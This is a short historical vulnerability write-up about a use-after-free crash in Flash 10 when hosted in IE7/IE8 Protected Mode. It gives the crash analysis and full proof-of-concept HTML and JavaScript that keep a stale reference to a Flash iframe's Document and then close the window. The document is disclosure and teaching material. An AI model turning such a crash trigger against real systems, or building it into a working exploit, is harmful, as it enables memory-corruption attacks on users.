Saving a reference to the Document object of an iframe that hosts a Flash file, and then closing the window that contained the iframe, crashes IE7 and IE8 when they run in Protected Mode. The faulting instruction is inside Flash itself (Flash10c!DllUnregisterServer+0x265cd), not in the browser; the crash was classified PROBABLY_EXPLOITABLE because data read from the faulting address controls code flow (crash hash 0x55367d68.0x28600b49). In other words, the Flash OCX is torn down while the page still holds a reference to its Document, and the stale object is then dereferenced.
<!-- index.html: opens the new window (needs a user click so the popup is not blocked) -->
<script language="JavaScript">
    function main()
    {
        window.open('new_window.html');
    }
</script>
<input type="button" onclick="main();" value="Click here">

<!-- new_window.html: keeps a reference to the Flash iframe's Document on the opener, then closes itself -->
<iframe id="swfIFrame" src="swf.swf"></iframe>
<script>
    window.onload = function()
    {
        // The reference outlives this window, so the Flash OCX is unloaded while it is still referenced
        opener.pDocument = document.all.swfIFrame.Document;
        window.close(); // Crash!
    }
</script>
The crash reproduces only with IE Protected Mode enabled; it was confirmed on Vista with IE7 and on Windows 7 with IE8, both in Protected Mode, using Flash 10.0.32.18. Because the fault originates in the Flash OCX during its cleanup rather than in the browser, the issue was also reported to Adobe.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago and are shared here as a historical record for learning purposes.